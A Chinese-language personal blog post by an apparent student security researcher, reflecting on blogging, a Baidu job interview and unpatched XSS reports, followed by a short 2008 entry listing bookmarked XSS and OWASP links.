  从在mifor师傅的blog转移到这里，我开始相信，过多依赖网络，还真会使灵感走向枯竭，思维模式也慢慢改变，离以前的那个自己越来越远。从以前的每天更新到现在，我已经认为，我是个不适合写< rong>的人，甚至一些很有想法的时候，也不想在BLOG上表现出来，看着每天不少的朋友光临，关注着我的朋友，还有申请连接的朋友，心中还是有些XX（词穷了），还有abu师傅，我知道这个空间其实远远不只当初的那几百M了 ^.^

   从5月百度面试回来到现在，好象也没变什么，依旧还是那样，偶尔做一做知识整理，看看聚合，关心一下最近业界出了什么新闻，什么地方出了哪些安全问题，存在的安全隐患，新的漏洞。。只是，研究的时间少了，真的感觉自己，慢慢离安全这个话题越来越远，但是CC总说得对，走得多远还是得看自己。

  最近刺发了一期的百度XSS，看了一下，还有我报过的几个，呵呵，从上次百度的面试中，其实也发现了这个问题，百度对WEB安全实在是很不重视，记得有几个XSS我还是直接报给相关人员的，一直到现在也没有补。还记得Dr.Li问我的几个WEB安全问题，也只是很轻描淡写的几句。我那时后在想，百度上次那个worm就没什么好说的了，而且临时挖就能找到一堆XSS。以至于现在刺暴出一系列XSS问题，我一点也不觉得吃惊。

  不过兄弟们能去百度的话还是很好的，这段时间百度对安全还是相当的重视，而且web安全方面缺乏相关的人才，特别是应届毕业在百度的待遇在业界都很有竞争力，而且去的时候最好是系统部的Doctor Li面，他是一位知识渊博且很有亲和力和谦虚的人，在他面前你无需感到紧张不过建议去的同学还是要加强其他方面的知识，尤其是linux和程序方面、安全编码经验等，做好充分的准备：）

  再过一年就毕业了，目前的想法是在北京工作，今天在这里BLOG一下，希望明年回头看到这些年走来的路，能够倍感欣慰。还是要感谢xundi师傅，cc总，ben总，nuke师傅，caoz师傅，谢谢你们给我这么多宝贵的机会。

XSS Related

2008-05-11T21:47:31+08:00
From my over sized Firefox scrapbook and draft queue cleanup:

http://mybeni.rootzilla.de/mybeNi/2007/this_is_the_first_weblog_xss_worm/

http://www.seo-blackhat.com/xss-cheat-sheet/

http://www.owasp.org/index.php/Main_Page